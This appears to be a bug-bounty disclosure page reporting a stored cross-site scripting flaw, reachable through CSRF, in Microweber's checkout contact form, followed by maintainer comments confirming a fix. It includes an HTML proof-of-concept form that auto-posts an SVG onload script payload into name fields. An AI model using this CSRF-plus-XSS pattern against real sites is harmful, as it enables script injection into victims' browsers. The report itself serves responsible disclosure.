Cross-site Scripting (XSS) - Stored in microweber/microweber

Valid

Reported on

Jun 25th 2021

✍️ Description

Hello, I found CSRF + XSS on website so the impact of XSS could be presented.

There is no CSRF token or protection on: http://example.microweber.me/checkout/contact-information-save CSRF HTML PoC:

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://example.microweber.me/checkout/contact-information-save" method="POST">
      <input type="hidden" name="first&#95;name" value="&quot;&gt;&lt;svg&#32;onLoad&#61;alert&#40;5555&#41;&gt;" />
      <input type="hidden" name="last&#95;name" value="&quot;&gt;&lt;svg&#32;onLoad&#61;alert&#40;5555&#41;&gt;" />
      <input type="hidden" name="email" value="asdf&#64;gmail&#46;com" />
      <input type="hidden" name="phone" value="000000000" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

and when we submit request XSS gets executed at the same time. Also personal information always stay there so it counts as Stored XSS

Video of me showing everything: https://youtu.be/H9XTNUzdtHg

💥 Impact

JS executed on victims browser while the person is in Checkout

Occurrences

shipping-and-payment.php L16-L23

References

Z-Old

commented 2 years ago

Admin

Hey kirareys, since I was not able to find a security policy or other method of contact, I've created an issue on the repo asking a way to responsibly disclose this vulnerability. Waiting to hear back; good job!

We have contacted a member of the microweber team and are waiting to hear back 2 years ago

A microweber/microweber maintainer validated this vulnerability 2 years ago

kirareys has been awarded the disclosure bounty

The fix bounty is now up for grabs

A microweber/microweber maintainer marked this as fixed with commit 846a63 2 years ago

The fix bounty has been dropped

This vulnerability will not receive a CVE

A microweber/microweber maintainer

commented 2 years ago

Maintainer

Hello, thank for the report, this is a valid issue and has been fixed now in this commit https://github.com/microweber/microweber/commit/846a63ca216eee5a934f6f616d4a2fac4cc899cf

kirareys

commented 2 years ago

Researcher

Nice, thanks for attention :) Regards

to join this conversation

Z-Old

commented 2 years ago

Admin

We have contacted a member of the microweber team and are waiting to hear back 2 years ago

A microweber/microweber maintainer validated this vulnerability 2 years ago

kirareys has been awarded the disclosure bounty

The fix bounty is now up for grabs

A microweber/microweber maintainer marked this as fixed with commit 846a63 2 years ago

The fix bounty has been dropped

This vulnerability will not receive a CVE

A microweber/microweber maintainer

commented 2 years ago

Maintainer

Hello, thank for the report, this is a valid issue and has been fixed now in this commit https://github.com/microweber/microweber/commit/846a63ca216eee5a934f6f616d4a2fac4cc899cf

kirareys

commented 2 years ago

Researcher

Nice, thanks for attention :) Regards

to join this conversation